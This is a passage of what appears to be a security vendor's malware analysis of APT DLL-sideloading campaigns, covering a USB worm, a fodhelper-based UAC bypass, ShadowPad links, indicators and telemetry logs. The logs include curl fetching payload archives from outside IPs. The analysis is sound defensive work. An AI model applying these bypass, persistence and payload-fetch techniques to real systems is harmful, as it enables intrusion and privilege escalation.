stamp: 2021-Aug-19 21:21:29<\/p>\n<p>This stops the current service, creates the event Global\\ACT, then calls the sendSAS function of sas.dll with parameter 0. It then loads local.plg (if the service was found) and main.plg, all expected in C:\\ProgramData\\Netsky. main.plg is hollowed into a dllhost.exe process.<\/p>\n<p>It opens C:\\ProgramData\\Netsky\\vs_session.dat, which appears to be a flag file (though we were unable to recover it for examination). If the file is not present, the process keeps checking in a loop.<\/p>\n<h4>local.plg<\/h4>\n<p>This contains the encrypted config, using a different encryption method than the implants. The decoded data contains these strings:<\/p>\n<pre>cfg_find_tag  test  188.127.237.27  188.127.237.27  674e8fb2f2c8d8699200d56493722c90<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87835\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png\" alt=\"Hex dump of a config, showing an IP address\" width=\"640\" height=\"375\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png 1150w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png?resize=300,176 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png?resize=768,450 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image9.png?resize=1024,600 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 9: A screenshot taken from a memory dump<\/em><\/p>\n<h4>main.plg<\/h4>\n<p>Compile time stamp: 2021-Aug-19 21:04:16<\/p>\n<p>During installation this implant is hollowed into dllhost.exe. It contains the embedded vtcp.dll from the <a href=\"https:\/\/github.com\/m0n0ph1\/malware-1\/blob\/master\/Trochilus\/bin\/Bin\/vtcp.dll\">Trochilus RAT collection<\/a>.<\/p>\n<p>This DLL is loaded into memory, gets the exports from vtcp.dll, and uses them later in communication.<\/p>\n<p>vtcp.dll uses CNetDiskClientSocket vftable functions for communication. It reads in and decrypts local.plg. It has a predefined hardcoded data structure that is overwritten with the decoded content. This hardcoded structure could be used in testing, or when there is no local.plg file found. The content of this hardcoded config is:<\/p>\n<pre>cfg_find_tag  mark  192.168.211.1  192.168.211.1<\/pre>\n<p>It registers the application as class \u201cMSN Shessll &#8211; %d\u201d; the number is generated by a call to the Windows API function GetTickCount. Next, it logs keystrokes to a file.\u00a0 It creates dir.dat in both C:\\ProgramData\\Netsky and C:UsersAll Users. Both files will contain the name of the directory where the sideloading components were installed, in this case, C:ProgramDataNetsky.<\/p>\n<p>The process generates debug logs during execution, as shown in Figure 10:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87836\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png\" alt=\"Screenshot showing events being logged\" width=\"446\" height=\"215\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png 446w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image10.png?resize=300,145 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/a><\/p>\n<p><em>Figure 10: Logs generated by the process<\/em><\/p>\n<h3>Case 4: Scenario D, the USB disk hijacker<\/h3>\n<p>Based on the internal development info stored in the files, this scenario goes by the code name \u201cU Disk Hijacking.\u201d<\/p>\n<h4>Sideloader DLLs<\/h4>\n<h4><em>u2ec.dll<\/em><\/h4>\n<pre>Creation Time\u00a0\u00a0 2021-09-01 09:23:30 UTC  First Submission 2022-01-02 04:07:47 UTC<\/pre>\n<p>Contains the PDB path:<\/p>\n<p>G:projectAPTU\u76d8\u52ab\u6301newu2ecReleaseu2ec.pdb<\/p>\n<p>(Translation of Chinese text: U Disk Hijacking)<\/p>\n<p>We found a variation of this file on VirusTotal. The only difference is some appended data:<\/p>\n<pre>MD5 230c9a22104d5363d2e2738a6ac62b80  SHA-1\u00a0\u00a0 a693a273a23ec3ad274469492dc8db9f85f31c8f  SHA-256 a519c4e5dadd68c2301e65689857907941af23565bc19bb938fd3c51ff5f34ca<\/pre>\n<h4><em>Implants<\/em><\/h4>\n<p>The implants are stored in an encrypted format. They are decoded by the loader shellcode. These implants are DLL files with no exports; the main code is the entry code.<\/p>\n<h4>usb.ini<\/h4>\n<p>Interestingly, this artifact does not appear to do any C2 communication.<\/p>\n<p>PDB File Name : G:projectAPTU\u76d8\u52ab\u6301newshellcodeReleaseshellcode.pdb<\/p>\n<p>(Chinese text: U Disk Hijacking)<\/p>\n<p>The icon and the name of the executable spoofs a removable drive icon, thus tricking the victim into clicking on it. The directory listing would look as shown in Figure 11:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87837\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png\" alt=\"Screenshot of a directory listing, showing a spoofed removable USB\" width=\"316\" height=\"398\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png 316w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image11.png?resize=238,300 238w\" sizes=\"auto, (max-width: 316px) 100vw, 316px\" \/><\/a><\/p>\n<p><em>Figure 11: The spoofed icon<\/em><\/p>\n<p>Then a warning may be displayed:<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87838\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png\" alt=\"Screenshot of a Windows security warning\" width=\"616\" height=\"444\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png 616w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image12.png?resize=300,216 300w\" sizes=\"auto, (max-width: 616px) 100vw, 616px\" \/><\/a><\/p>\n<p><em>Figure 12: Windows flags the attempt to run the file, but the information the user sees inspires trust<\/em><\/p>\n<p>However, because the executable is (apparently) clean and signed, the victims is not suspicious.<\/p>\n<p>If it is not running from a path that contains \u2018programdata\u2019, it infects the computer and proceeds to do the following creation and copying actions:<\/p>\n<p>It creates the installation directory udisk and copies document\/image files there, then copies every file from the current directory (directory of GetModuleFileName) to c:programdataudisk.<\/p>\n<p>It creates the following autorun key in the registry:<\/p>\n<pre>HKCUSoftwareMicrosoftWindowsCurrentVersionRun\u00a0\u00a0 udisk    c:programdataudiskdisk_watch.exe<\/pre>\n<p>It then copies itself to the following locations and executes those copies:<\/p>\n<pre>c:\\programdata\\udisk\\disk_watch.exe  c:\\programdata\\udisk\\DateCheck.exe<\/pre>\n<p>If it is running as disk_watch.exe, it infects USB disks by replicating itself there.<\/p>\n<p>This is the timeline of the infection process from the logs:<\/p>\n<p>First, u2ec.dll loads the payload:<\/p>\n<pre>2022-05-02T03:26:54.419932Z\u00a0\u00a0 [ e:usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   FileRead ===&gt;\u00a0\u00a0 [ e:u2ec.dll ]  2022-05-02T03:26:55.212781Z\u00a0\u00a0 [ e:usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   FileRead ===&gt;\u00a0\u00a0 [ e:autorun.infprotection for autorunsystem   volume informationusb.ini ]<\/pre>\n<p>Then, files (documents created in the root by the user rather than the worm itself) are copied to the installation directory, as are instances of the worm and components of the other sideloading scenarios. After all that, an autorun registry key is created:<\/p>\n<pre>2022-05-02T03:27:46.035555Z\u00a0\u00a0 [ e:usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   RegKeySetValue ===&gt;\u00a0\u00a0 [ HKEY_USERSS-1-5-21-2519359479-851945054-  3016455893-1321SOFTWAREMicrosoftWindowsCurrentVersionRun ]  2022-05-02T03:27:46.198285Z\u00a0\u00a0 [ e:usb drive.exe::13956 ]\u00a0\u00a0\u00a0\u00a0 ===   RegKeySetValue ===&gt;\u00a0\u00a0 [   HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows   NTCurrentVersionNotificationsData ]<\/pre>\n<h3>Case 5: Scenario E, the Win10 UAC bypass<\/h3>\n<p>The following components were used:<\/p>\n<pre>c:userspubliclibrariesoutsymstore.exe :   83e51f9d467977238f9fa5107106918ed5102f1a3e06eeba9a33d21d5df49d6a  c:userspubliclibrariesoutsymsrv.dll :   9c2f1eeea169f2dd196bc9a0d240d941ccb5a22a050bca856c1a03fd795ac58d  c:userspubliclibrariesoutmsvcrt.dll :   d8cf89e651a2e1d9f8f653d16ecbca979d6c9459329a015ff825eff38792ed24<\/pre>\n<p>In this case there is no additional encrypted payload file; the sideloaded DLL, symsrv.dll, is the payload itself.<\/p>\n<h4>SYMSRV.dll<\/h4>\n<p>PDB path:<\/p>\n<p><em>C:UsersadminDesktopdjwklqjdlwqjldwqjlkfjwlqkjlqwjglqwjglqjlgjwqkjgkSYMSRV.pdb<\/em><\/p>\n<p>This is a 64-bit loader DLL that does a UAC bypass trick to execute commands, including the unidentified 3.exe component, as explained in <a href=\"https:\/\/pentestlab.blog\/2017\/06\/07\/uac-bypass-fodhelper\/\">this blog from PenTestLab<\/a>.<\/p>\n<p>The implant executes various commands, which are inserted into the registry key <em>HKCU Classesms-settingsCurVer<\/em>. It then tries to execute two different Windows components, both of which are vulnerable to the UAC bypass method:<\/p>\n<pre>c:windowssystem32fodhelper.exe  c:windowssystem32ComputerDefaults.exe<\/pre>\n<p>When these clean Windows components are executed, they read the command to be executed from the registry key and run it with higher privileges.<\/p>\n<p>We observed the following commands executed in this fashion:<\/p>\n<pre>C:\\users\\public\\libraries\\3.exe  mkdir C:\\programdata\\googleupdate  C:\\Users\\Public\\Libraries\\out\\googleupdate.exe<\/pre>\n<p>The implant needs to make sure that another execution will not interfere, so it creates a flag in the registry: if it is set, some other command is in progress. The flag key is <em>HKCUClassesaaabbb32shellopencommand<\/em>.<\/p>\n<p>The threat actors show strong devotion to the DLL sideloading technique here. This UAC bypass method could have been compiled into any of their implants; instead, the simple logic has been implemented as a standalone sideloading scenario, and the debug features exploded the payload to a huge (1.1MB) DLL file.<\/p>\n<h3>Scenario F: A connection to ShadowPad?<\/h3>\n<p>As mentioned, a VirusTotal hunt led us to additional cases from non-Sophos sources. This case was found via VT hunting; it dates from January 2021, but the shared characteristics clearly connect it to our cases from 2022.<\/p>\n<h4>Sideloader DLLs<\/h4>\n<p>The following file was identified:<\/p>\n<pre>73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6: log.dll  MD5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 63971f35a4282343eced55ebdfd1cb0b  SHA-1\u00a0\u00a0\u00a0 bee88779a9c65543a9cfa5069b4486131a23e55d  SHA-256 73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6  Creation Time 2021-01-25 05:43:52 UTC  Signature Date\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 05:48 AM 01\/25\/2021  First Submission\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2022-01-26 05:43:49 UTC<\/pre>\n<p>Signed by a self-signed digital signature claiming to originate from, but not actually originating from, Bitdefender:<\/p>\n<pre>BitDefender SRL  Name\u00a0\u00a0\u00a0\u00a0\u00a0 BitDefender SRL  Status This certificate or one of the certificates in the certificate chain is not   time valid. The certificate or certificate chain is based on an untrusted root.  Issuer BitDefender SRL  Valid From\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 05:48 AM 01\/25\/2021  Valid To\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 05:48 AM 01\/25\/2022  Valid Usage\u00a0\u00a0\u00a0\u00a0 All  Algorithm\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 sha256RSA  Thumbprint\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 A9CA14BA90962DEA552F6A5FB2E5970ACF939EDE  Serial Number 01<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-87839\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png\" alt=\"Screenshot of a digital certificate's signing details\" width=\"640\" height=\"477\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png 702w, https:\/\/news.sophos.com\/wp-content\/uploads\/2022\/11\/image13.png?resize=300,224 300w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 13: The questionable digital certificate<\/em><\/p>\n<p>It loads the payload from the file qutmain.dat.<\/p>\n<p>This sideloading scenario consists of the following files:<\/p>\n<pre>73048579a2903918bbcc601cd562e8f93459ad2a562c6537006067b59735b7b6 *log.dll  bcc588207d62a44149df54bd948815bdcfe60e7864bae00d6cd619f5d6cc2257 *qutload.dat  7529e60f377b24c60914ec909dbfdc0e60ad9e18fbf9750a4463acf33a7ce16f *qutmain.dat  386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd *qutppy.exe  fb65524f27e847ac073a61d2c3eeae6a9447e34836347bbd7baff22a07cf0b01 *vsserver.dat<\/pre>\n<p>Here, the .dat files are the encrypted plugins; quttpy.exe is the clean loader from Bitdefender (Bitdefender Crash Handler). The use of this clean file in sideloading scenarios has been reported (though with different payload files) since early 2021 and attributed to ShadowPad, aka <a href=\"https:\/\/news.sophos.com\/en-us\/2021\/03\/04\/covert-code-faces-a-heap-of-trouble-in-memory\/\">NetSarang<\/a>. (Additionally, Trend Micro detects the encrypted .dat files as Trojan.Win32.SHADOWPAD.CGW.enc.) There is an additional file info.dat, which should contain the actual configuration data, but we weren\u2019t able to recover it.<\/p>\n<p>The log.dll loader uses the same obfuscation as the earlier cases, and the decrypted plugin files used the same shellcode loader. We believe this is a reasonably strong connection with the campaigns in 2022.<\/p>\n<h4>Implants<\/h4>\n<h4>qutmain.dat<\/h4>\n<p>This file is essentially the same as alloc.plg. It refers to the following locations where the installed plugins are stored:<\/p>\n<pre>C:ProgramDatamosqutppy.exe  C:ProgramDatamosqutload.dat  C:ProgramDatamosqutppy.exe online  C:ProgramDatamosinfo.dat  C:ProgramDatamosvsserver.dat  C:ProgramDatamosqutppy.exe install<\/pre>\n<p>It generates similar debug messages with the <em>[fortest]<\/em> tag as well, and contains exactly the same UAC bypass component.<\/p>\n<h4>qutload.dat<\/h4>\n<p>This is the same as free.plg; only the file paths have changed to reflect the different scenario.<\/p>\n<h4>vssserver.dat<\/h4>\n<p>This is the same as main.plg. It contains the same hardcoded default config values:<\/p>\n<pre>cfg_find_tag  mark  192.168.211.1  192.168.211.1<\/pre>\n<h4>info.dat<\/h4>\n<p>This is the encrypted configuration file. We haven\u2019t been able to recover it.<\/p>\n<h3>Scenario G: The old-timer<\/h3>\n<p>This is a very early sample (from 2017!) that shows the same obfuscation as the newer cases, as well as a similar default hardcoded configuration. It was found via VT.<\/p>\n<p>The file info:<\/p>\n<pre>MD5\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 413bb0864c3933009a9cc486f07070e4  SHA-1\u00a0\u00a0\u00a0 f5895c69c995ac8b7f01ff85df9777595fe8b35d  SHA-256 b2a332fb6e896a896f72e6bbbf6351d756f1ab6a57fbe662050ed1c18cad3e4b  Creation Time 2017-03-23 12:20:10 UTC  First Submission\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2017-05-14 05:16:34 UTC<\/pre>\n<p>Contains an embedded executable:<\/p>\n<pre>389058c291b536eb65ba3a65e2024eb6350ff1a5ed48c036692bf5fed4729970<\/pre>\n<p>Some characteristic strings from the embedded executable:<\/p>\n<pre>hTTP\/1.1 403 fORBIDDENRNRN&lt;h1&gt;403 fORBIDDEN&lt;\/h1&gt;  HtTp\/1.0 200 OKRNRN  192.168.1.2<\/pre>\n<p>Also, a similar config data is stored, but with a different marker at the beginning:<\/p>\n<pre>mmconfig-tag  192.168.1.33  KarSpy  KarSpy  Kar security services<\/pre>\n<p>Sideloading components could be identified from the code:<\/p>\n<pre>%CommonProgramFiles%SandboxieSbieDll.dll  %CommonProgramFiles%SandboxieSandboxie.exe  %CommonProgramFiles%Sandboxie<\/pre>\n<p>The malicious DLL is attributed as gh0st RAT. Details of the payload are unavailable at this time.<\/p>\n<h2>Appendix: A Tour of the Worm Circus<\/h2>\n<p>From our telemetry data we reconstructed the steps of the infection process. Here\u2019s the timeline for Case 4 (\u201cWorm Circus,\u201d) the most complex attack. This is the one that both delivered a USB worm in its payload and ingested portions of other APTs:<\/p>\n<p>Execution of initial sideloading:<\/p>\n<pre>2022-06-24T03:11:11.519857Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesciscosparklauncher.dll ]  2022-06-24T03:11:11.519857Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspublic2831329086.inf ]  Downloading the RAR archive  2022-06-24T04:02:58.673626Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe::36336 ]  \u00a0\u00a0\u00a0 === IpConnector ===&gt;\u00a0\u00a0 [ 103.253.72.116 ]  2022-06-24T04:02:58.793284Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe::36336 ]\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutv1.rar ]<\/pre>\n<p>Unpacking the files of the second sideloading:<\/p>\n<pre>2022-06-24T04:03:54.211485Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutsymsrv.dll ]  2022-06-24T04:03:54.243728Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutsymstore.exe ]  2022-06-24T04:03:54.249938Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutmsvcrt.dll ]  2022-06-24T04:03:54.263187Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::39988 ]\u00a0\u00a0\u00a0\u00a0   === FileRead ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutv1.rar ]<\/pre>\n<p>This shows execution of the second sideloading attack, which creates registry keys to register a custom file extension and a custom command to open files of that extension. This could be a persistence tactic, similar to <a href=\"https:\/\/news.sophos.com\/en-us\/2022\/02\/01\/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence\/\">how SolarMarker does it<\/a>.<\/p>\n<pre>2022-06-24T04:05:43.119771Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutsymsrv.dll ]  2022-06-24T04:05:43.159707Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeyCreate ===&gt;  \u00a0 \u00a0 \u00a0[ HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-  1001_<strong>Classesaaabbb32shellopencommand<\/strong> ]  2022-06-24T04:05:43.160709Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeySetValue   ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-  1001_Classesaaabbb32shellopencommand ]  2022-06-24T04:05:43.161131Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeyCreate ===&gt;   \u00a0 \u00a0 \u00a0 \u00a0[ <strong>HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-1001_Classesms-<\/strong>  <strong>settingsCurVer<\/strong> ]  2022-06-24T04:05:43.162128Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === RegKeySetValue   ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-  1001_Classesms-settingsCurVer ]<\/pre>\n<p>Creation of yet another 3.exe file (symstore.exe -&gt; fodhelper.exe -&gt; 3.exe)<\/p>\n<pre>2022-06-24T04:05:43.318703Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutsymstore.exe::39668 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:windowssystem32fodhelper.exe ]  2022-06-24T04:05:44.215109Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssystem32fodhelper.exe::26224 ]  \u00a0\u00a0\u00a0\u00a0\u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe ]\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  2022-06-24T04:05:44.240169Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64hmpalert.dll ]  2022-06-24T04:05:44.242168Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssystem32conhost.exe ]<\/pre>\n<p>Fodhelper.exe executes 3.exe. But before that, the registry key HKEY_USERSS-1-5-21-1497078658-3044148255-4064547459-1001_Classesms-settingsCurVer is created. This is likely a UAC bypass method similar to the one Pentestlab <a href=\"https:\/\/pentestlab.blog\/2017\/06\/07\/uac-bypass-fodhelper\/\">described<\/a> in 2017 and more <a href=\"https:\/\/threatpost.com\/trickbot-switches-to-a-new-windows-10-uac-bypass-to-evade-detection\/152477\/\">recently used<\/a> by Trickbot.<\/p>\n<p>The threat actor then executed 3.exe, which deletes the components of sideloading scenarios. Note the presence of the files nvsmartmax.dll and nvsmartmax.dat. <a href=\"https:\/\/www.cybereason.com\/blog\/research\/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\">Cybereason has previously reported<\/a> that they are used by a Chinese APT group in their attacks.<\/p>\n<pre>2022-06-24T04:05:44.568617Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]  \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdategoogleupdate.exe ]  2022-06-24T04:05:44.570493Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdategoopdate.ja ]  2022-06-24T04:05:44.571488Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatelibvlc.dll ]  2022-06-24T04:05:44.573479Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]  \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdateloader.ja ]  2022-06-24T04:05:44.574480Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatenvsmartmax.dat ]  2022-06-24T04:05:44.576644Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatenvsmartmax.dll ]  2022-06-24T04:05:44.577473Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === FileDelete ===&gt;\u00a0\u00a0\u00a0 [ c:programdatagoogleupdatetime.sig ]  2022-06-24T04:05:44.580460Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibraries3.exe::42928 ]   \u00a0 \u00a0 \u00a0 === RegKeySetValue ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [   HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesbamStateUserSettingsS-  1-5-21-1497078658-3044148255-4064547459-1001 ]<\/pre>\n<p>Downloading the components of the third sideloading scenario:<\/p>\n<pre>2022-06-24T04:08:34.208478Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesciscocollabhost.exe::38752 ]\u00a0\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64cmd.exe ]  2022-06-24T04:08:34.348517Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64cmd.exe::38472 ]  \u00a0\u00a0\u00a0\u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe ]  2022-06-24T04:08:34.732663Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64<strong>curl.exe<\/strong>::41216 ]  \u00a0\u00a0\u00a0 === IpConnector ===&gt;\u00a0\u00a0 [ 5.252.178.162 ]  2022-06-24T04:08:35.412783Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:windowssyswow64curl.exe::41216 ]  \u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutc.rar ]<\/pre>\n<p>Unpacking the files from the downloaded RAR archive:<\/p>\n<pre>2022-06-24T04:10:14.279520Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutgoopdate.ja ]  2022-06-24T04:10:14.299137Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesout<strong>libvlc.dll<\/strong> ]  2022-06-24T04:10:14.301128Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesout<strong>loader.ja<\/strong> ]  2022-06-24T04:10:14.307180Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesouttime.sig ]  2022-06-24T04:10:14.310114Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutgoogleupdate.exe ]  2022-06-24T04:10:14.322856Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileWrite ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutgoogleupdate.exe ]  2022-06-24T04:10:14.322856Z\u00a0\u00a0\u00a0\u00a0\u00a0 [ c:program fileswinrarrar.exe::40260 ]  \u00a0\u00a0\u00a0\u00a0 === FileRead ===&gt;\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutc.rar ]<\/pre>\n<p>Execution of the third sideloading scenario:<\/p>\n<pre>2022-06-24T04:11:16.921480Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutgoogleupdate.exe::41944 ]\u00a0\u00a0 === FileRead ===&gt;  \u00a0\u00a0\u00a0\u00a0 [ c:userspubliclibrariesoutlibvlc.dll ]  2022-06-24T04:11:16.962673Z\u00a0\u00a0\u00a0\u00a0\u00a0 [   c:userspubliclibrariesoutgoogleupdate.exe::41944 ]\u00a0\u00a0 === FileRead ===&gt;  